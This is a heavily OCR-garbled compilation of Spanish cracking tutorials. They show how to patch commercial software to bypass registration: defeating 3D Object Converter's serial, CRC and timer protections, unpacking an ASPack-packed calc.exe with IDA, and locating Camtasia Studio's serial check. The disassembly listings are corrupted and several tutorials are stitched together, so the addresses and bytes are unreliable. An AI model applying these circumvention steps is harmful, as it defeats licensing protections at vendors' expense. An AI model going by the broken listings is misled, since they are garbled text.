803D 57208004 CMP BYTE PTR DS: [B02057]1,0 «(ue 


75 09 

ES 35BAESFF 
3400 

75 2A 

3BCB 

B2 Bl 

Al ECó46100 
ES BB3S5ESFF 
AS 947F7C00 
Al 947F7C00 
3B10 


TEST AL, AL 


MOU ECX, EBX 
MOV DL, 1 
MOV EAX, DWORD PTR DS: [616460] 


MOV DWORD PTR DS: [7C7F94],EAX 
MOV EAX, DWORD PTR DS: [7C7F94] 
MOU EDX, DWORD PTR DS: [EAXI 


FF92 ES098009 CALL DWORD PTR DS: CEDX+E8] 


UNZ SHORT Sdconver.00613RED fa 


3dconver. BM46B37C 


EIP 60613ADD <3dconver.->TUnregisteredForm. ShowModal() > 


Estamos en lugar caliente y con el flag famoso, un poco más arriba. 

Si se produce el salto en 00613AC1 ya no pasa a presentar la nag inicial. 

Si entro en la call de 00613ABA llego al mismo lugar de comprobación del serial, 
por lo que va a ser necesario “operar” en: 


0049F58B /75 25 
0049F598 /75 18 


|]NZ SHORT 3dconver.0049F5B2 
|]NZ SHORT 3dconver.0049F5B2 


Necesitan desaparecer o bien una inversión del condicional. 
Invierto los condicionales y guardo los cambios.Restart, Run y dice esto, jeje: 


PEE ETRE 


A 


The 3D Object Converter v4,20 executable file is corrupted, possible VIRUS infection ! 
3D Object Converter v4,20 will close. Please run a virus scanner as soon as possible | 


Click en OK y se cierra.Me ha pillado en una comprobación de integridad del 
ejecutable, como consecuencia de haber alterado el exe. 


6. 


Empieza a sacar sus defensas. 


El autor es muy hábil.Tiene respuestas para las intrusiones en su código; la 
monitorización; he visto threads “asesinos”; puede llegar a bloquear el arranque 
invitando a instalar la última versión del programa y existe un fichero llamado 
3dconverter.dat, un tanto extraño.Hay muchos interrogantes por estudiar y de este 
programa se puede sacar mucho jugo.Lo dejaré para otro día.Ahora voy al grano. 
Empiezo el contra-ataque buscando la cadena de texto y la encuentro aquí: 


DOGBBEFF 


BO6BE c 13 
DOBEBECID 


ES 1889DFFF 
803D 6020801 
|, 74 1F 
6A Ba 
66:8809D S8SEl 
33D2 

BS 2CEBF600B 
ES C2BBESFF 
BS 01000008 


PUSH B 


3dconver. 68484510 
CMP EVTE PTR DS: [E9206D],0 


MOU CX,WORD PTR DS: [66BD58] 
XOR EDX, EDX 
MOU EAX, 


MOV EAX, 1 


FLAG CRC 


ASCII "The 3D Object Converter v4.20 executable 


Veo que en la linea 0OO60BCOB hace la comparación fatal.En la posición de memoria 
B0206D no tengo el valor O;tengo el valor 1, por lo cual no salta y me sale el cartel 
de marras. 

Busco referencias a la posición de memoria BO206D: 


References in 3dconyer:CODE to 00B0206D 


Address |Disassembly 

MOU BYTE PTR DS: [B9020601,1 
MOU BYTE PTR DS: [B020607,1 
MOU BYTE PTR DS: [B9206D7,0 
CMP BYTE PTR DS: [B9206D1,4 


y veo lugares donde le asigna los flags.Pongo un BP todos ellos. 
También averiguo y anoto el CRC32 del fichero original 3dconverter.exe: 


CRC32 v1.0 by Gelios E! 
CRC32: E7A07648 


Y también el CRC32 del que me ha dado el error: 


CRC32 v1.0 by Gelios Es! 
CRC32: DIDMEAFA, 


Restart, Run y para en uno de ellos: 


ES A2B0ESFF 
A1 COD9FSOD MOU EAX, DWORD PTR DS: [FSD9C0] CRC CORRECTO 
AS AB21B000 MOV DWORD PTR DS: [BO021A07,EAX 
Al AC20B000 MOV EAX, DWORD PTR DS: [BO26ACJ CRC ERRONEO 
3B05 AG216000 |CMP EAX, DWORD PTR DS: [BO21A6] 
Y4 46 

6060699D|  C665 S5B20B900 1MOU BYTE PTR DS:[B0205B],0 
C665 6020B000 1MO0U BYTE PTR DS: [B9206D1, 1 FLAG CRC NOK 


No se ha ejecutado el salto condicional que hay en 0060B99B.Pongo un BP en 
0060B981.Restart, Run y para.Sigo con F8 y veo como compara los CRC: 


EAX=0994ERFA 


Se me ocurre variar la línea donde se le asigna el valor a EAX antes de la 
comparación, de este modo: 


Al CODIFSGM MOV EAX, OWORD PTR DS: [FSD9C67] | CRO CORRECTO 
BBE6BBISB AS AB21B000 MOV DWORD PTR DS: [602146], EAX 

BOGBBIIB Al COD9FSOD MOV EAX, DWORD PTR DS: [CFSD9C67 | CRC ERRONEO 
BB6BB995. 3B405 AB21B000 |CMP EAX,OWORD PTR DS: [B421467 

BBÉBE9IIB|, 74 46 


y así siempre comparará el mismo valor.Saltará a 0O60B9E3 y el flag será O. 


JBBGBBSES| —csos sozogeos (mou BYTE PTR DS:[B9206DJ,0 [FLAG CRC OK 


Guardo los cambios, Restart y Run. 
Para en el otro lugar en el que comprueba el CRC otra vez: 


8B15 AC20B000 [MOV EDX,DWORD PTR DS:[B920ACJ | CRC ERRONEO 
3815 AB218000 |CMP EDX,DWORD PTR DS: [B921A0] 

OB616958|., 74 BB JE SHORT Sdconver. B061605D SI SALTA CRC DK 
00616052| | AL S6148000 [MOV EAX,DWORD PTR DS: [B01480] 

00616057| | ES CSSBESFF 

Ba616585C c3 

061665D| *+33D2 XOR EDX, EDX 


Procedo con la misma idea que antes: 


ep1S Aoz1BOGa | mou EDX,DWORD PTR DS:[BO21A03 [CRC ERRONEO 
3815 AG218000 |CMP EDX,DWORD PTR DS: [BO21A6] 
y 74 68 JE SHORT Sdconver.BO61695D [SI SALTA CRC OK 


Y así siempre comparará el valor CRC correcto.Guardo los cambios. 


7.-Un inciso. 


Como puede ser que te estés preguntando ¿porqué este tío no ha cambiado el 
condicional que hay antes de sacar el cartel de que tiene un virus?.Te explico: 


3030 6D20B000 1CMP BYTE PTR DS: [B6206D7,0 FLAG CRC 
BOÉBECOB .. 74 1F 


5A 60 PUSH O 
66:8B0D SSBD601 MOU CX,WORD PTR DS: [60BD58] 
33D2 XOR EDxX, EDX 


0060ec1is| |Bs 2CBF60008  |MOV EAX, ASCII "The 3D Object Converter v4.20 
006B0EC1D| | ES C2BBESFF  |CALE 


Lo hice y me estaba esperando con una trampa, sin aviso previo, en la que me 
insinuaba algo así como: “Nunca debiste cruzar el Mississipi, forastero”. 
Esto es lo que sucedió y en color moña: 


Lo arranco sin Olly y empieza bien pero al rato, un boom espectacular.Se muere. 
Me ha vuelto a pillar. Está jugando conmigo....pues,i juguemos!. 

Mido, a ojo de buen cubero, con ayuda del reloj del sistema el tiempo transcurrido. 
Veo que pasan aproximadamente 2 minutos hasta que "casca”. 

Debe poner en marcha un contador de tiempo y he de dar con él. 

Una de las APIS normalmente usada es SetTimer. 

Lo vuelvo a abrir en Olly y la busco: 


ME Name (label) in current module 


Find references to » Name in all modules 
ne A Command 
Copy to executable » 
A Sequence of commands 
Analysis » 
Constant 
Appearance » Binary string 


Hay más de una llamada.Pongo un BP en cada una de ellas: 


Found intermodular calls 


Address |Disassemb ly Destination 
CALL <JMP.Luser32.SetTimer> |user32,SetTimer 
CALL <JMP. $user32.SetTimer> ',SetTimer 
CALL <JMP. £user32,SetTimer> ',SetTimer 
CALL <JMP. £user32,SetTimer> :,SetTimer 
CALL <JMP. £user32,SetTimer> ¿SetTimer 


user 


user 


Le doy a Run y para aquí: 


on444032| 6n en PUSH a 
Ba0444 PUSH ESI 
00444035 PUSH 1 
100444937 MOV EAX, DWORD PTR DS: [EBX+34] 
00444034 PUSH EAX 

ES 8844FCFF | CALL <JMP.tuser32.SetTimer> 
00444040| 85C0a TEST EAx, EAX 


BBOFOZOC | 11d >= BBBFBZOC (clas 
B1FBFO74| 6O0BBBOB1 |] TimerID = 1 
BIFBFO?7S| BBBIDICO|| Timeout = 120000. ms 
B1FBFD7C| 600909090900 |LTimerproc = NULL 


Te pillé malandrín.En la pila se ve claramente. 
Ahí le da cuerda al reloj de la ventana para 2 minutos (120000 milisegundos). 
Le echo un ojo a la ayuda de esta API y con el parámetro hWnd, puedo jugar: 


hWnd 

Identifies the window to be associated with the timer. This window must be owned 
by the calling thread. If this parameter is NULL, no window is associated with the 
timer and the nIDEvent parameter is ignored. 


Esos preciosos 4 bytes enmarcados en rojo en la figura de arriba han de convertirse 
en otros tantos que anulen la trampa.Voy a intentar poner a cero el hWnd y que 
ocupe 4 bytes.Incremento EAX en una unidad y a continuación se la decremento, 
con lo cual el registro EAX se queda igual (consumo dos bytes).Meto en la pila el 
valor O para que el parámetro hWnd quede sin valor, así: 


0R44413A PUSH 9 
BlaF4413C PUSH ESI 
0044413D PUSH 1 
0044413F INC EAX 
a DEC EAX 
PUSH O 
BASFCFF | CALL <uMP.tuser32. SetTimer> 
sssaaesa | + = NULL 


TimerID = 1 
Timeout = 120600. ms 
Timerproc = NULL 


B2DCFD74 
B2DCFD?3 
B2DCFD?C 


o00BB0Bi 
p0B1D04CO 
0000B00a 


Guardo los cambios y lo arranco fuera de Olly. Conseguido, ya no se cierra. 


8.-Continuación. 


Perdón por el inciso, pero quería contar esa experiencia también. 

Sigo por donde me habia quedado. 

Lo arranco fuera de Olly y me vuelve a salir la nag cojonera que me recuerda que 
no estoy registrado, justo al arrancar el programa. 


Esto es cosa del flag en 00B02057 de nuevo.Lo comprueba muchísimas veces y hay 
que andar con pies de plomo, porque hay ocasiones en que lo pone a 1 adrede y va 
provocando excepciones si no le cuadran sus conbinaciones, con los flags. 

Pero siempre hay puntos débiles por donde meter el ariete y probar.Me fijo en esta 
zona en que llega el flag a 1 y hay una oportunidad de ponerlo a cero: 


00616442 Al 18BF6100 | MOU EAX, DWORD PTR DS: [618F18] 
00616447 3800 MOU EAX, OWORD PTR DS: [EAXI 
00616449 33738 04 BB |CMP DWORD PTR DS: [EAX+41],0 
B061644D0|., 74 10 
Al 88006150 | MOU EAX, DWORD PTR DS: [610088] 


00616454 CóbB Ba MOU BYTE PTR DS: [EAXI,0 
00616457 Al 44BA6100 | MOU EAX, DWORD PTR DS: [61BA44] 
60616450 Có06 Bu MOV BYTE PTR DS: [EAXJI,5 
B061645F 3300 OR EAX, EAX 

40616461 SA POP EDX 


[00610988]=00B92057 <a 


Debe pasar por los dos condicionales y nunca saltar.Así se consigue poner a cero el 
flag en 00BO02057.De ese mismo flag, también depende la única limitación que 
tiene: 


14B49F438 
MOU EAX, DWORD PTR DS: [6106388] 
0049F442|| CMP BYTE PTR DS: [EAXJ,08 


0049F447 || MOU EAX, DWORD PTR DS: [61BB4C] 
0049F44C || CMP BYTE PTR DS: [EAXJI,0 
BO49F44F 
0049F451 || PUSH 

0049F453|| MOU CX,WORD PTR DS: [49F468] 
AR49F4SAN XOR EDX, EDX 


0049F45C|| mov o ASCII "This save module is not available in the UNREGISTERED mode t” 
0049F461 


[0061C083]-00B92057 «(A 


Ahora ya entra directo y con el About sin rastro de unregistered. 


9.-La estocada final. 


Para rematar la faena voy a ver si consigo quitarle del menú Help el apartado 
Register y los Purchase de encima, que ya no sirven para nada: 


* 3D Object Converter v4.20 — -C:¡Documents and $ 


File Draw View Tools 


(==) hi tl EJ Té Contents 


Index 


Check For updates... 


Purchase (Moneybookers) 


Purchase (PayPal) 
Purchase (Reg.Net) 


About... 


Me cansé de darle vueltas al código buscando la activación de estos menús y al 
final tuve que utilizar un editor de recursos (cosa que no quería). 


Primero cambié las características de la sección .rsrc, para que se pudiera escribir 
en ella, luego en el editor le anulé esos menús, quedando así: 


* 3D Object Converter v4.20  -C:¡Documents dq 


File Draw  Yiew Tools 


o/Al el EJ í Contents 


Index 


Check for updates... 


IN 


10.-Moraleja. 


He aprendido que cuando se trata de flags, es preferible encontrar la causa del flag 
negativo a mis intereses y no tocar los condicionales que vienen a continuación de 
la comparación de su estado.Como se ve en este caso, es consultado en otros 
lugares que pasan desapercibidos a simple vista. 

De todos modos, en cracking todo es válido jejeje. 
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tiene un corazón ENORME.Me refiero al personaje que se colaba en el IRC, como 
MrEslao o Marselo y que todos conocemos como MORALES (así, en mayúsculas). 
Gracias tío por el montón de cosas que nos enseñaste. 
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CRAcErPLATIRETS TE CRACK TO ODER c06O71 


Introducción 


Hola a todos, 


Volvemos con otro tuto sobre IDA. Esta vez vamos a realizar nuestro primer 
Desempacado. Decir que el debugger de IDA, al menos el de la versión 5.2, tiene el 
inconveniente que encontrado 2 excepciones que no sabe manejar se cierra. Ante esa 
perspectiva antes de empezar con packer que usen trucos anti-debug que nos puedan 
volver locos vamos a realizar el desempacado de un Aspack, algo sencillo para ir 
entrando en calor. 


El programa no es otra cosa que la calculadora de Windows XP que me paso 
Aguml, gracias. 


Recordar que actualmente estoy trabajando con Vista 64 bits, esto hace que 
herramientas con el LordPE no funcionen bien y el ImporRec pues también murió. 


El sustito natural del ImporRec es el ChimpRec que como veremos tiene un GUI 
muy similar. El sustituto del LordPE pretendo que sea el Sir PE pero aun le queda 
mucho para estar a la altura, por el momento solo Dumpea y muestra los principales 
datos de la cabecera PE y PE+. 


Configurando IDA para trabajar con Packers 


Lo primero a tomar en cuenta es en la carga del programa en IDA 


Load file C:4UsersguanDesktoptcalctcalc.exe as 
Portable executable for 80386 (PE] [pe.Idww 
MS-DOS executable [EXE] [dos.ldw] 

Binary file 


Processor type 


Intel 80x86 processors: metapc y Set | 


Analysis 
Loading segment Y| Enabled 


Loading offset Y! Indicator enabled 


Dptions 
Create segments Kemel options] 
Load resources 


El Rename DLL entries 
Manual load | Kemel options2 ] 


Fill segment nans 


Create FL4T group 


System DLL directory C:W'indows 


Cancel Help 


Marcamos Manual Load y desmarcamos Make import. 

Esto es debido a que como es un packer la IAT que nos interesará no estará en la que se 
indica en la cabecera. Luego damos a OK y vamos aceptando las ventanas hasta que se 
abre IDA. 


Una vez abierto abrimos la configuración del Debuger, marcamos que se pare en el EIP 
y en el apartado de las excepciones pulsamos el botón EDIT. 


Vamos seleccionado todas las excepciones para que NO pare y pase a la Aplicación. La 
intención es que si nos encontramos con un INT3 (trampa del packer) esta sea 
gestionada por la aplicación y sigua su curso normal. 


Exception handling 


Code: 0x80000002 
Name: EXCEPTION_DATATYPE_MISALIGNMENT 


[1 Stop prograrn 
[Y] Pass to application 


Esto es un poco coñazo de hacer a mano para todos los packer, por eso IDA nos permite 
configurarlo en el fichero exceptions.cfg 


"IO 7] <« Disco local (C:) » Archivos de programa (86) [ 10A » efg | » cfg v | +9 [ 


Archivo Edición Ver Herramientas Ayuda 


MY Organizar Y := Vistas y 8 Abrir ¡Y Grabar 


3) Exceptions.cfg]- Bloc de notas 
Archivo Edición Formato Ver Ayuda 


; This file describes the exception definitions. 
; The definitions will be used for new databases. 


for each exception: 
code stop_at  pass_to_app name description 


code is the exception code 

stop_at is one of stop or [nestop]- should the debugger suspend 
the process when _the exception occurs 

pass_to_app ¡is one of|app lor deb - should the debugger pass 
the exception TO the application or not 

name is the exception short name 

description is the exception description displayed to the user 


; Windows exceptions 

.win32 

0xC0000005 stop deb EXCEPTION_ACCESS_VIOLATION The instruc 
0Ox80000002 stop deb EXCEPTION_DATATYPE_MISALIGNMENT A datatype 


MAANCANANANAN MN A ne A A A 


Simplemente cambiar stop por nostop y deb por app 


Por desconocimiento simplemente dejo como están las 2 últimas excepciones 


DEEFFA... EXCEPTION_BCC_FATAL No Application 
DEEDF.... EXCEPTION_BCC_NORMAL Application 
40010005 DBG_CONTROL_C Stop Debugger 


40010008 DEG_CONTROL_BREAK Stop Debugger 


Bueno ya estamos preparados damos a OK y pulsamos F9 para empezar a depurar. 


Una vez parados en el EP quitamos por si las moscas el byte de Debuger present así: 


C: windows! syswow641shlwapi.d11 
Debugger: Library loaded: C:+wWindowstSyswOw6411mm32.d11 
Debugger: Library loaded: C:1windowstsyswow641msctf.d11 
Debugger: Library loaded: C: windows: syswow6411pk.d11 

Debugager: Library loaded: C:'wWindowstsyswow641usp10.d11 
' ¡ rf Toaded: C:1Windows1WinSx51x86_microsoft.windows 


Debugger: Library loaded: 


c 


PatchByte[EB<+2,0] 


Bueno recordemos que este packer responde a la técnica PUSHAD / POPAD. 


Es decir guarda el estado de los registros, hace lo que tiene que hacer, repone los 
registros y salta al OEP. 


9101F0901 public start 
0101F001 start proc near 


0101F002 call loc_101F00A 


La técnica para el que aún lo la conozca es sencilla. 


Hacemos F7 (step in). Parados sobre la call ponemos un HW on Access sobre los 4 
primeros Byte del ESP. 


Breakpoint settings 


Address esp 


Enabled [Y] Hardware breakpoint 


Hardware breakpoint settings 
Size: El = 


Modes: (9) Read/Write 
Write 


Execute 


Conditiory 


Actions 
Y | Break Trace 


Una vez situado damos a F9 y esperamos a que pare. 


O Hardware data breakpoint at ODOBFFEC has been triggered 


Dont display this message again 


Lo que esta pasando es que hemos puesto un HW para que pare justo cuando el packer 
va a recuperar los datos guardados en la pila, es decir los registro que comentamos 
antes, en otras palabras estaremos a pocos pasos de llegar al OEP porque ya habrá 
desempacado todo. 


A 


-aspack:0191F3AF popa 


.aspack:0101F3B2 mou eax, 1 
.aspack:0101F3B7 retn BCh 

SS A 
.aSpack:0101F3BA 

.aspack:0101F3BA loc_101F3BA: 

* .aspack:01091F3BA push 1012475h 

* .aspack:0101F3BF retn 


ARI A 


. o fo . 


Estamos en la zona azul y vemos que salta a una estructura tipo push ret. Esto no es más 
que otra forma de escribir un JMP. Vemos que salta a la dirección 1012475h que si 
vemos los segmentes vemos que se encuentra en la sección .text 


HEADER 01000000 01001000 
ns 01001000 01014000 


:y text 


2 .data 01014000 01016000 
A isc 01016000 0101F000 
A aspack 0101F000 01027000 
A .adata 01027000 01028000 
2 debug028 01030000 01177000 


Es decir estamos saltando al OEP. 


ARO A EN Cad WA A AA RA TN NDA | 


.text:01012477 push 10015E 0h 
.text:0101247€ call sub_10127C8 


.text:01012481 xor ebx, ebx 

.text:01012483 push ebx 

.text:01012484 mou edi, dword ptr ds:unk_1001020 

.text:0101248A call edi ; kernel32 GetModuleHandleA 

.text:0101248C cmp word ptr [eax], 5A4Dh 
Realizando el DUMP 


Como esto es un programa de 32bits, en este caso LordPE podría valer pero 
quiero enseñaro a mi pequeña criatura, aun está lejos de estar acabada pero al menos ya 
podemo dumpear programas de 32 y 64 bits con ella. Este programa es de 64 bit nativo. 


1 Sir PE 


1 win32_remote64.exe 
== 


sw ñ 
14 Mmspaint.exe 
3 calc.exe 

= 

=]PE.exe 


Dirección Archivo Imagen Base Tamaño Imagen 


. =— Dump Todo 
2, CAwWindowsisystem324ntdil. dll O000000076E 9000 - 
(23) CWindowsksystem32:wowB4. dl oooo00007503000 PUMP Parcial 


E CAwWindowsisystem32wowb4wwin. dll D000000074FEO000 0004000 


¡2 CAWindowsisystem32%wowB4cpu. dll 0000000075100000 00009000 
2) CiwindowsiSysW0W644ntdll. dll D000000077030000 00160000 


Os presento a Sir PE. Para dumpear simplemente localizar en la lista de procesos 
nuestro programa y en la lista de módulos en este caso el .exe 


Pulsamos el botón derecho y damos a Dump Todo. 
Nos pide un nombre, en este caso le llamo GUAN.exe 


Si todo ha ido bien se presenta un cartelito diciéndolo, luego se nos presenta el siguiente 
Cartel. 


Opciones de Cabecera del DUMP 


(0) Mantener Cabecera PE 
>) Cabecera PE del fichero 


> Cabecera PE de otro fichero 


Y Alinear secciones 


Cancelar 


Por defecto podemos mantener la cabecera tal y como se encuentra en memoria. Por 
otra parte algunos packer tipo Armadillo están tomando la costumbre de modificar la 
cabecera que se encuentra en la memoria, para evitar trabajo podemos marcar el tomar 
la cabecera del fichero del programa o de otro fichero. 


Muy importante tener activo la alineación de secciones si queremos que funcione. 
Recordar que en un DUMP el Voff debe de ser igual que el RawOff y el VSize a 
RawSize. 


Si todo ha ido bien tenemos otro cartel. 


Bueno solo falta actualizar el EP de la cabecera de nuestro dump. 
Para ello pulsamos sobre Editor PE y seleccionamos nuestro dump. 


A. Editor PE - Guan.exe - [PE-32] 
Opciones Datos de Cabecera 


Dd o 23bBK 


AddressOfEntryPoint 


0001F001 


Descripción 


Campos Datos Campos Datos Descripción 


Machine 
NumberdDiSections 
TimeDateStamp 
PointerT oSymbolT able 
NumberDfSymbols 
SizeDfOptionalHeader 
Characteristics 


D14c 
0005 
38708410 
D0000000 
0000000 
DOED 

D10F 


Magic 
MajorLinkerYersion 
MinorLinkerYersion 
SizeDíCode 
SizeDfInitializedD ata 
SizeDfUninitializedD ata 
AddressOfEntryPoint 
BaseUiCode 
BaseDíData 
ImageBase 
Sectionálignment 
Fileálignment 
MajorOperatingS ystemWersion 
MinorOperatingS ystemWersion 
MajorlmageWersion 
MinorlmageWersion 
MajorSubsystemWersion 
MinorSubsystemWersion 
Win32VersionW alue 
SizeDfimage 
SizeDíHeaders 
CheckSum 


Subsystem 
ll aan tatoo 


0108 

D7 

DO 
00012800 
D0009600 


00014000 
01000000 
00001000 
0000200 
0005 
0001 
0005 
0001 
D004 
D000 
DOD00000 
00028000 
00000400 
D00264€E9 
D002 


aan 


4 K 


” 


En el titulo de la ventana vemos si es un fichero de 32 bits (PE-32) o de 64 (PE-64). 


Seleccionamos el EP (AddressOfEntryPoint) y ponemos el nuevo 12475 y damos a 
aplicar. Luego damos a guardar y ya estamos listos. 


IAT 


Este packer no rompe la IAT como podemos comprobar. 


:01012484 mou 
:08101248A call 
:0101248C cmp 
:01012491 jnz 


edi, duword ptr ds: 
edi ; kernel132 GetHoduleHandlea 
word ptr [eax], S5A4Dh 
short loc 10124B2 


.text:01001000 (3: CIA 39 DÓ BC 75 29 F4 BD 75 66 60 66 68 
.text:01001010 4C 53 9B 76 6D 58 9B 76 18 51 9B 76 00 00 00 00 
.text:01001020 5F 22 246 75 F8 4D 46 75 F9 15 246 75 5C€ 29 AD 75 
.text:01001030 11 BB 46 75 03 BA 46 75 BD B2 47 75 6A B8 47 75 
.text:01001040 79 0C 46 75 E7 61 47 75 D7 09 246 75 AF AA 47 75 
.text:01001050 4B D8 46 75 BD 16 246 75 MA 58 46 75 34 DF 246 75 


Nota: una vez en el OEP podemos forzar a IDA que Reanalice el programa haciendo 
más legible lo que tenemos. 


Y Analysis indicator 
li Reanalyze program 


Bueno para repara la IAT en 64 bit no podemos usar ImporRect, ya que este no 
funciona, pero tenemos el ChimpRec (también en desarrollo) que un primo muy 
cercano, su manejo es idéntico. 


9 CHimpREC - ReCon Edition - (C) 2008 TiGa 


Attach to an Active Process 
[calc.exe (000010E0) v ] 
=== —Imported Functions Found: : 


advapi32. dll FThunk:0000 1000 NbFunc:3 (decimal: 3) valid: YES 
adi32.dll FThunk:00001010 NbFunc:3 (decimal: 3) valid: YES 
kernel32.dll FThunk:0000 1020 NbFunc: 1£ (decimal: 30) valid:YES 
shell32. dll FThunk:0000109C NbFunc: 1 (decimal: 1) valid: YES 
user32. dll FThunk:0000 1044 NbFunc:45 (decimal:69) valid: YES 
msvcrt.dll FThunk:000011BC NbFunc: 1A (decimal: 26) valid: YES 


: 


IAT Auto: 


Invalid 


Log 


Original IAT found at: 00001000 in Section RVA: 00001000 SIZE: 00013000 
IAT read successfully! 
rva: 10D4 forwarded from mod:ntdll.dll ord:023D name:NtdllDefWindowProc_W 


Current imports: 
6 (decimal:6) valid modules 
84 (decimal: 132) imported functions | 


0 (decimal:0) unresolved pointers 


er ll 


" j 


IAT Infos needed New Import Infos —— 
OEP RVA: IATRVA: IAT Size: Section Size: 
| 00012475 | 00001000 | 0000022: | 000008BF 


Damos a Fix y seleccionamos nuestro dump. 


= “q. .. . m 
Nombre 


Fecha modificación Tipo Tamaño 
3) calc.exe 10/09/2002 13:00 Aplicación 59 KB 
|_jcalc.idO 20/11/2008 23:15 Archivo IDO 96 KB 
| ¡calc.idl 20/11/2008 23:19 Archivo ID1 648 KB 
| ¡calc.nam 20/11/2008 23:19 Archivo NAM 16 KB 
|| calc.til 20/11/2008 23:19 Archivo TIL 1KB 
3 Guan.exe 20/11/2008 23:55 Aplicación 160 KB 
21/11/2008 0:04 Aplicación 163 KB 


Ejecutamos y .... 


Nombre 


y Calculadora 
Edición Ver Ayuda 


3 calc.exe 
|_¡calc.idO 
| jcalc.idl O. 
| _|calc.nam 

| ¡calc,til 


A 
Nous ña ta a ma 
7 
ES 
Es] 


Bueno esto se acabo aquí, espero que os haya gustado. 

Especial agradecimiento a Aguml que me paso un packer sencillo para hacer el tuto, a 
Ricardo por esos primeros tutos sobre IDA y por supuesto a toda la pandilla de 
CrackSLatinoS. 


Hasta la próxima. 


PARCHEANDO CAMTASIA STUDIO 6.0.0 Fecha: 20/11-2008 


PT 


ATA LT NS, AR AA FAZ 
CPACESLATINCE 17 ORAR 


Programa a estudiar Camtasia Studio v 6.0.0 
Ollydbg y 1.10 


Parchear la rutina de 
validación del serial y 
estudiar la forma de 
encontrar dicha rutina 


Objetivo 


Dedicatoria y agradecimientos: En esta ocasión quiero dedicar este tutorial a mi mujer 
con la que me he casado este mes, niña gracias por tu paciencia durante todo este 
tiempo. 


Quiero agradecer a Arapumk el haber sugerido en la lista el método de DestroyWindow 
que se utiliza en el tutorial. 


Por supuesto casi todo lo aquí escrito ha salido del curso de cracking desde cero de 
Ricardo Narvaja, gracias maestro por tu afán de compartir tus conocimientos. 


Y por último un abrazo a todos los amantes del cracking y muy en especial a la lista de 
CracksLatinos en la que tan a gusto me encuentro. 


Si echamos una miradita al camtasia con cualqier detector de packers vemos que no 
está empacado, tiene alguna protección antidebuging pero es mínima, yo usaré el 
ollyghost con el olly advanced como protección. 


PARCHEANDO CAMTASIA STUDIO 6.0.0 Fecha: 20/11-2008 


Al iniciar el progry nos da la bienvenida con una nag, indicándonos los días que nos 
quedan e invitandonos a comprarlo o a introducir un serial. 


En el menú de ayuda vemos también la opción de comprar el camtasia o entrar la clave. 


Camtasia Studio Help... F1 


Show Welcome Window 


Support | 
Check for Upgrade 

Frequently Asked Questions 

Tell a Friend 

Getting Started Videos 

TechSmith on the Web » 


Reset Balloon Tips 


About Camtasia Studio 


Purchase Camtasia Studio... 


Enter Software Key... 


Pues vamos a la faena, cargamos el progry en el Olly y con F9 lo ponemos a correr, en 
la nag metemos los datos: 


Camtasia Studio Evaluation a | 


Welcome! 


Thank pou for using Camtasia Studio. 


Ifyou have already purchased Camtasia Studio, please 
enter the Software Key pou received now, 


NOTICE! Camtasia Studio will stop functioning when the 
trial period expires. 


; 0 30 days left 30 
a x_>jEO————— — — — _ _ _— —_—_—<KÉKX2> 
Camtasia MS 
St J . | would like to evaluate Camtasia Studio 
uc IO 5) | would like to purchase Camtasia Studio now 
 ecSmith (1 | have a Software Key: 


Name: [lose | 


http: +4wswww techsmith. corn Key: 1234567890 | 


(Cancelar ) 


PARCHEANDO CAMTASIA STUDIO 6.0.0 Fecha: 20/11-2008 


Pulsamos finalizar y nos aparece el mensaje de que nos hemos colado: 
Camtasia Studio (2) 


You must enter a valid software key. 


En este momento y sin pausar el programa nos vamos a Olly y ponemos un bp en el API 
DestroyWindow 


Cc 


omnanc bp DestroyWindow) w BF 


E” 


CALL NEAR DWORD PTR DS:[EDX 
RETN 


Vamos a quitar el bp de 7ZE3ODAEA y con Alt+F9 ejecutamos hasta el código del 
progry, caemos en esta funcion: 


CALL NEAR DWORD PTR DS:[751880 


CALL NEAR DWORD PTR DS:[751A28 
CALL NEAR DWORD PTR DS:[751A28 


CALL NEAR DWORD PTR DS:[750928 


CALL NEAR DWORD PTR DS:[751C2C 


ETN 


PARCHEANDO CAMTASIA STUDIO 6.0.0 Fecha: 20/11-2008 


Como podemos ver ninguno de los dos saltos nos libran del MessageBoxW de chico 
malo luego la decisión de tirarnos a la basura debe tomarse antes, así que traceamos con 
FS hasta pasar el RETN 4 


MOU EAX,DWORD PTR DS:[EDX+1C] 
CALL NEAR EAX 
MOUZX ECX,AL 
TEST ECX,ECX 


B06BF1ED 
BO6BFAFA 
B06BF1F1 
B06BF1FA4 
BB6BFAFÓ 
BB6BF1F9 
BO6BF1FC 
BO6BF1FE 
B06BF200 
B06BF2085 
B06BF20A 
B06BF20F 


8B55 08 -HOU EDX,DWORD 
PUSH EDX 
8B45 E8 HOU EAX,DWORD PTR 
8B10 HOU EDX ,DWORD 
8B4D E8 HOU ECX, DWORD 
8B42 28 HOU EAX,DWORD 
FFDO CALL NEAR EAX 
33C08 NOR EAX,EAX 
E9 24010000 
68 5C3F75008 PUSH 753F5C 
68 F80D79008 PUSH 7968DF8 
8B4D BC HOU ECX,DWORD PTR SS:[EBP+C] 


SS: [EBP-18] 
DS:[EAX] 


AS IO OSO O A OO OO 
ES 


Vamos a poner un BP en el CALL asesina de 6BF1E4 corremos el programas pulsamos 
finalizar y caemos en el CALL NEAR EAX (si dejamos en nombre en blanco nos tira 
antes). Vamos a pasarlo con F7 y miremos un poco que hace (como es facilito lo 
explico muy por encima) 


BOSDE652 PUSH ECX 


B05DE653 8B4D F8 HOU ECX,DWORD PTR SS:[EBP-8 
CALL 806BF BE 


BO5DEÓSB 8845 FF HOU BYTE PTR SS:[EBP-1],AL 
BOSDEGSE BFB655 FF HOUZX EDX,BYTE PTR SS:[EBP-1] 


RAFTRTTITO nr am TFOrT ra ranas 


Si entramos en el CALL 006BFOFO enseguida nos damos cuenta que mira que nuestro 
serial mida OE (14 en decimal) o más y contenga solo números en hexa o guiones, si es 
así lo da por bueno en otro caso sigue mirando: 


JIUS>UEDOZ - v>UZ IES! EVA,EVA 

JOSDE664 | .. 75 65 

JOSDEG666 | . 8BXD 08 MOU ECX,DWORD PTR SS:[EBP+8] 
JOSDE669 | . FF15 ALL—NEAR_DUJORD-PTR_DS: [751404] 


JOSDEGÓF |. 83F8 19 CMP EAX,1D | 


JO05DE672 | .. 74 17 
JGOSDE6G74 | . 8B4D 68 H0OU ECX,DWORD PTR SS:[EBP+8] 

: : NEAR _DUNRD_PTR_DS:[751A04] 
JG65DE682 | . C745 F4 80001 


JOSDE677 | . FF15 
HOU DWORD PTR SS:[EBP-C],0 
J05DE689 | ... EB 07 


JO5DE67D | . 83F8 15 
JO5DE680 | .. 74 69 | 
JO5DE68B | > C745 FA 01881 MO0U DWORD PTR SS:[EBP-C],1 


